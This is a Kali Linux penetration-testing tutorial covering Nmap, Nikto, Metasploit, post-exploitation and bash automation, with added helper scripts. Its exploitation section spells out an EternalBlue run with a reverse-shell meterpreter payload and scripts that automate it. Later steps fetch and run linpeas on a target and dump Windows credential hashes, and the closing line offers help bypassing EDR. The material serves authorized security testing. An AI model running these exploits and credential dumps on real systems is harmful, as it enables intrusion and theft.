How To Use Kali Linux

#Cybersecurity#PenetrationTesting#Linux#KaliLinux#Nmap#Metasploit

Mastering Kali Linux: Core Workflow for Penetration Testing

Kali Linux is an industry-standard platform for offensive security engineering, pre-loaded with over 600 specialized tools. The volume can overwhelm; efficiency depends on depth with a compact toolkit, not breadth across unused software.


Know Your Baseline: Terminal Proficiency and System Hygiene

Start with fundamentals. The CLI is non-negotiable—most automation and tool orchestration assumes command-line familiarity.

  • Keep Kali current. Kali is a rolling distribution, so version lag compounds quickly, and outdated scanners, signature databases or exploit modules yield inconclusive or misleading results. Kali's own documentation recommends full-upgrade (dist-upgrade is the older equivalent) rather than a plain upgrade so that dependency changes are applied:

    sudo apt update && sudo apt full-upgrade -y
    
  • Ad-hoc tool install: When reaching for tools outside the default install, stick to the Kali apt repositories for stability and signed packages:

    sudo apt install nmap

    Note: Avoid curl | bash installs from arbitrary URLs unless you download the script, read it and verify its source first. Tool supply-chain compromise is a real risk, and a pentest box holds client data.

  • Filesystem operations: Since Kali 2020.1 the default account is the unprivileged user kali, whose home is /home/kali; only when you work as root is home /root (and it is /root, not /home/root). Use ~ or $HOME so paths stay correct either way, create report and log directories before writing into them, and verify ownership and permissions of anything you drop:

    mkdir -p ~/reports/2024_siteA
    cd ~/reports
    ls -lh

    Side effect: Multiple users on the same VM? Give each operator a private work directory created under a restrictive umask (077), or set the sticky bit on any shared directory so users can only delete their own files. Otherwise artifacts get trampled.


Reconnaissance: Quick, Precise Network Intelligence

Forget tool fatigue. Nmap alone, used well, covers most of an initial target assessment.

Nmap, Version 7.94+ Preferred

  • Ping sweep the subnet: Identify live hosts with minimal noise. No ports are scanned, but when run as root nmap still sends an ICMP echo request, a TCP SYN to 443, a TCP ACK to 80 and an ICMP timestamp request to every address.

    nmap -sn 10.10.10.0/24 -oG sweep.gnmap
    
    • -sn: disable port scans, only host discovery
    • -oG: grepable output, works with custom parsing scripts
  • Service and version enumeration. -sS needs raw sockets, and nmap refuses it without root privileges, so run it with sudo:

    sudo nmap -sS -sV -T4 10.10.10.12 -oN host12_services.txt

    • -T4: trade-off. Aggressive timing is fast but may trip an IPS on a perimeter.
    • Always cross-verify "filtered" and "open|filtered" ports with a second scan (slower timing, a connect scan, or a UDP scan as appropriate) before reporting them as anything.
  • OS detection, default scripts and traceroute (-A enables -O, -sV, -sC and --traceroute) with XML output for later parsing:

    nmap -A -oX host12.xml 10.10.10.12
    

    XML output integrates with Dradis, Serpico, or custom parsers.

Whois & Dig: Domain Recon for Internet-Facing Targets

Use-case: Mapping an org's external attack surface.

whois bigcorp.example | grep -i 'email'
dig +short MX bigcorp.example

Note: Field names in whois output vary by registrar and TLD (there is no guaranteed "Tech Email" field, hence the case-insensitive grep), and privacy masks and registrar proxies are increasingly common. Treat whois as a starting point and supplement it with subdomain enumeration tools as needed.


Vulnerability Assessment: Fast-Track the Obvious

Automated scans catch low-hanging fruit, but require context.

  • Nikto (2.5.0+) for web servers. Nikto infers the report format from the -output file extension; pass -Format explicitly so the choice is unambiguous:

    nikto -h https://siteA.corp -output nikto_siteA.html -Format htm

    Side note: Nikto is noisy and easily logged by the target. Keep it inside the engagement's rules of engagement, and do not run it where intrusive scanning has not been authorized.

  • Nmap Vulnerability Scripts:

    Preferred over heavyweight scanners for speed on constrained connections. Quote the script glob so the shell cannot expand it against files in the current directory:

    nmap -p 445,139 --script 'smb-vuln*' 10.10.10.12 -oN smb_vuln_scan.txt

    Gotcha: NSE scripts fire on port state and, for most scripts, on the detected service. Restricting -p to the default ports means an SMB service listening elsewhere is never touched, which is a silent false negative. Pair the scripts with -sV and a wider port range when non-default ports are a possibility.


Exploitation: Consistent, Auditable with Metasploit

Metasploit Framework (6.x) is extensible but prone to bloat if left unchecked. Always validate modules, payload compatibility, and possible detection artifacts.

msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.12
set LHOST 10.10.10.99
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
  • Session handling:
    Meterpreter sessions (sessions -l, sessions -i 1) often fail to establish because AV/EDR kills the stager on the target. Test stagers in a controlled lab first.
  • Logs:
    ~/.msf4/logs/framework.log holds the full module error output (the console only shows a summary). Check it when a module hangs or dies without a useful message.
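The interactive sequence above is hard to reproduce or audit after the fact. Resource scripts (msfconsole -r) make a run repeatable, and spool keeps a verbatim console log in the engagement directory. The following is an added example, not code from the original page or from the Metasploit project; the workspace name, addresses, file paths and the RUN_MSF guard are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example: generate an msfconsole resource script so an exploit run is
# repeatable and its console output is spooled to a log. Workspace name,
# addresses and paths are assumptions for this example, not real targets.
set -eu

# write_msf_rc WORKSPACE RHOST LHOST RC_PATH LOG_PATH
# Emits a resource script that selects a per-engagement workspace, spools
# console output to LOG_PATH, runs the module's check method first and only
# then launches the exploit as a background job. Prints RC_PATH.
write_msf_rc() {
    local ws="$1" rhost="$2" lhost="$3" rc="$4" log="$5"
    cat > "$rc" <<EOF
workspace -a $ws
spool $log
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
set LHOST $lhost
set PAYLOAD windows/x64/meterpreter/reverse_tcp
check
exploit -j
sessions -l
EOF
    chmod 600 "$rc"          # the script names client hosts; keep it private
    printf '%s\n' "$rc"
}

# rc_line_count RC_PATH: number of commands in the script, for a quick sanity
# check before handing it to msfconsole.
rc_line_count() {
    grep -c . "$1"
}

# run_msf_rc RC_PATH: hand the script to msfconsole. Guarded by RUN_MSF=1 so
# that merely executing this file on a box without Metasploit does nothing.
run_msf_rc() {
    if [ "${RUN_MSF:-0}" = 1 ] && command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$1"
    else
        echo "[*] dry run: msfconsole -q -r $1" >&2
    fi
}

# Demo with the article's lab addresses (assumed, not real targets).
RC_FILE="${RC_FILE:-/tmp/siteA_ms17_010.rc}"
write_msf_rc siteA_2024 10.10.10.12 10.10.10.99 "$RC_FILE" /tmp/siteA_ms17_010.spool >/dev/null
run_msf_rc "$RC_FILE"
```

check runs the module's vulnerability check, but a resource script does not branch on its result: for a check-only pass, drop the exploit line, read the spool file, then decide. The spool file is the artifact you attach to the report.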

Post-Exploitation: Escalation and Persistence (With Caution)

Privilege escalation and credential harvesting are high-impact. Always assess legal boundaries before using live targets.

  • Linux privilege enumeration:
    linpeas.sh is the de facto standard, but it has to reach the target over a channel you control and be verified after transfer. A plain HTTP fetch from your attacker box is acceptable on an isolated lab segment; either way, compare the hash with your local copy before running it:

    wget http://local.lan/linpeas.sh
    sha256sum linpeas.sh      # must match the hash of the copy on your Kali box
    chmod +x linpeas.sh
    ./linpeas.sh > linpeas_output.txt

  • Windows credential dump:
    Meterpreter's hashdump needs a SYSTEM-level session (getsystem first) and remains effective, though AV vendors increasingly block on the memory-access patterns it uses.

    hashdump

    Alternative: Invoke-Mimikatz, with the OPSEC cost that memory-resident payloads carry (PowerShell logging, blue-team alerts).


Scripting: Simple Automation for Consistent Results

Manual scanning doesn’t scale. Bash or Python are preferred for repeatable scans, chaining tool output.

#!/bin/bash
# Serial service scan of every host in targets.txt (one IP per line).
set -u
mkdir -p scans                        # -oN does not create directories
while read -r ip; do
    [ -z "$ip" ] && continue          # skip blank lines
    echo "[*] Scanning $ip"
    nmap -sV -oN "scans/${ip}_sv.txt" "$ip" </dev/null
done < targets.txt
  • Store reusable snippets in /usr/local/bin or a versioned "ops" scripts folder.
  • Known issue: The loop above is serial, which is slow on large lists. If you parallelize it (xargs -P, GNU parallel, background jobs), cap the concurrency, or the scanner exhausts local sockets and ephemeral ports.

Non-obvious tip: Use tmux or byobu for long-running scans, so lost SSH sessions don't kill jobs.
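The grepable -oG output from the ping sweep in the recon section is exactly what custom parsing scripts consume. As an added example (not code from the original page), the script below extracts live hosts from a constructed .gnmap sample, prints the per-host scan plan for review, and runs the scans with capped concurrency via xargs -P. The sample, the addresses, the scans/ directory and the RUN_SCANS guard are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example: parse Nmap's grepable (-oG) ping-sweep output into a target
# list and run per-host service scans with bounded parallelism. The sample
# below is constructed for this example; the addresses are not real hosts.
set -eu

# Constructed stand-in for sweep.gnmap as written by:
#   nmap -sn 10.10.10.0/24 -oG sweep.gnmap
SAMPLE_GNMAP='# Nmap 7.94 scan initiated Mon Jan 15 10:00:00 2024 as: nmap -sn -oG sweep.gnmap 10.10.10.0/24
Host: 10.10.10.1 ()    Status: Up
Host: 10.10.10.12 (fileserver.lab)    Status: Up
Host: 10.10.10.13 ()    Status: Down
Host: 10.10.10.99 (kali.lab)    Status: Up
# Nmap done at Mon Jan 15 10:00:05 2024 -- 256 IP addresses (3 hosts up) scanned in 4.21 seconds'

# live_hosts GNMAP: one IP per line for every host record marked "Status: Up".
# Comment lines and hosts in any other state are dropped.
live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }' "$1"
}

# scan_plan GNMAP: print the per-host nmap commands without running them, so
# the plan can be reviewed (or pasted into the engagement log) first.
# -sV needs no root; add sudo and -sS if you want a SYN scan.
scan_plan() {
    live_hosts "$1" | while read -r ip; do
        printf 'nmap -sV -oN scans/%s_sv.txt %s\n' "$ip" "$ip"
    done
}

# run_scans GNMAP [JOBS]: run the plan, at most JOBS commands at a time
# (default 4). Bounding concurrency is what keeps a large list from
# exhausting local sockets and ephemeral ports; unbounded "&" fan-out is
# the usual mistake.
run_scans() {
    local jobs="${2:-4}"
    mkdir -p scans
    scan_plan "$1" | xargs -P "$jobs" -I CMD sh -c CMD
}

# Stand-alone demo: materialise the constructed sample and show the plan.
# Real scans only run when RUN_SCANS=1 and nmap is installed.
demo() {
    local tmp
    tmp="$(mktemp)"
    printf '%s\n' "$SAMPLE_GNMAP" > "$tmp"
    echo "[*] live hosts:"; live_hosts "$tmp"
    echo "[*] plan:"; scan_plan "$tmp"
    if [ "${RUN_SCANS:-0}" = 1 ] && command -v nmap >/dev/null 2>&1; then
        run_scans "$tmp" 4
    fi
    rm -f "$tmp"
}
demo
```

Run it inside tmux, as the tip above says, and point it at the real sweep.gnmap with run_scans once the printed plan matches the scope.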


Organization: Segment Work, Control Output

Workspaces—especially within Metasploit—keep findings separate by engagement. Don't ignore simple structure (project dirs, timestamped logs).

Link findings with Markdown notes or Dradis for report prep.
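One way to make the "segmented work dirs" advice from the baseline section and the project-directory and timestamped-log advice here concrete, as an added example that is not from the original page. The directory layout, names and the LAST_LOG variable are assumptions for the example, not a Kali convention.

```shell
#!/usr/bin/env bash
# Added example: per-engagement working tree that only the operator can read,
# plus a wrapper that writes every tool run to a timestamped log. Directory
# layout and names are assumptions for this example.
set -eu

# new_engagement ROOT NAME: create ROOT/NAME with one subdirectory per
# artifact type. The umask makes every directory 0700 at creation time, so on
# a shared VM other users can neither read nor trample the artifacts.
# Prints the engagement path.
new_engagement() {
    local base="$1/$2"
    (umask 077 && mkdir -p "$base/recon" "$base/scans" "$base/loot" \
                           "$base/notes" "$base/report")
    # Record creation time in UTC so the engagement timeline can be rebuilt.
    printf '# %s\ncreated: %s\n' "$2" "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
        > "$base/notes/README.md"
    chmod 600 "$base/notes/README.md"
    printf '%s\n' "$base"
}

# logged_run DIR CMD [ARGS...]: run CMD, echoing its output to the terminal
# and to DIR/<UTC stamp>_<tool>.log, with the exact command line on the first
# line of the log. The log path is left in LAST_LOG for the caller.
logged_run() {
    local dir="$1"; shift
    LAST_LOG="$dir/$(date -u +%Y%m%dT%H%M%SZ)_$(basename "$1").log"
    { printf '$ %s\n' "$*"; "$@" 2>&1; } | tee "$LAST_LOG"
}

# Stand-alone demo in a throwaway directory; in practice ROOT would be
# something like ~/engagements.
demo() {
    local root base
    root="$(mktemp -d)"
    base="$(new_engagement "$root" 2024_siteA)"
    ls -ld "$base"
    logged_run "$base/scans" echo "placeholder for: nmap -sV 10.10.10.12"
    echo "[*] log written to $LAST_LOG"
    rm -rf "$root"
}
demo
```

Because the log file name carries the UTC timestamp and the tool name, a plain ls of scans/ already gives the order in which things were run, which is what a report timeline and a client's blue team both ask for.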


Summary: Adopt a Core Workflow, Ignore the Tool Mirage

  • Depth trumps quantity.
  • Keep Kali and its tools up-to-date.
  • Master Nmap, Metasploit, and at most one vulnerability scanner for daily work.
  • Automate to avoid mistakes and improve reproducibility.
  • Keep output organized and engagement artifacts reproducible.

Practical labs (e.g., HackTheBox, VulnHub) are worth more than endless "tool of the week" blogs. Side effect of this discipline: cleaner reports, happier clients.

Known alternative: Community forks and custom Kali builds offer bleeding-edge tools—only use if you can afford toolchain management overhead.


For advanced scripting, integration with CI for continuous security scans, or to discuss bypassing common EDR roadblocks, reach out directly.